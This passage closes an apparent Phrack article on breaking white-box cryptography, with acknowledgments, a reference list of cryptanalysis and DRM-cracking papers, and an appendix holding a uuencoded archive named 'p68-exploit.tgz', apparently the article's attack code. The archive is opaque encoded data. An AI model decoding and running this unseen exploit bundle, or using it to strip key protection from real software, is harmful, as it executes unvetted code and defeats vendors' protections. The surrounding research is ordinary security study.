      courage to write the paper
    - The Phrack Staff for publishing it


--[ 9 - References


[R01] http://en.wikipedia.org/wiki/Feistel_cipher
[R02] http://2009.hack.lu/index.php/ReverseChallenge
[R03] http://baboon.rce.free.fr/index.php?post/2009/11/20/
      HackLu-Reverse-Challenge
[R04] http://www.whiteboxcrypto.com
[R05] "Cryptanalysis of a White Box AES Implementation", Billet et al.
      http://bo.blackowl.org/papers/waes.pdf
[R06] "Digital content protection: How to crack DRM and make them more
      resistant", Jean-Baptiste Bedrune
      http://esec-lab.sogeti.com/dotclear/public/publications/
      10-hitbkl-drm.pdf
[R07] "White-Box Cryptography and an AES Implementation", Eisen et al.
      http://www.scs.carleton.ca/%7Epaulv/papers/whiteaes.lncs.ps
[R08] "White-Box Cryptography and SPN ciphers", Schelkunov
      http://eprint.iacr.org/2010/419.pdf
[R09] "A White-box DES Implementation for DRM Applications", Chow et al.
      http://www.scs.carleton.ca/%7Epaulv/papers/whitedes1.ps
[R10] "White-Box Cryptography", James Muir, Irdeto
      http://www.mitacs.ca/events/images/stories/focusperiods/
      security-presentations/jmuir-mitacs-white-box-cryptography.pdf
[R11] http://search.cpan.org/dist/App-Asciio/lib/App/Asciio.pm#NAME
[R12] http://dhost.info/pasjagor/des/start.php
[R13] "Cryptography: Theory and Practice", D. Stinson, 1st edition
[R14] "Clarifying Obfuscation: Improving the Security of White-Box
      Encoding", Link et al.
      http://eprint.iacr.org/2004/025.pdf
[R15] "White-Box Cryptography" (PhD thesis), B. Wyseur
      https://www.cosic.esat.kuleuven.be/publications/thesis-152.pdf
[R16] "Attacking an obfuscated cipher by injecting faults", Jacob et al.
      http://www.cs.princeton.edu/~mjacob/papers/drm1.pdf
[R17] "Cryptanalysis of White-Box DES Implementations with Arbitrary
      External Encodings", B. Wyseur
      http://eprint.iacr.org/2007/104.pdf


--[ 10 - Appendix


begin 644 p68-exploit.tgz
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
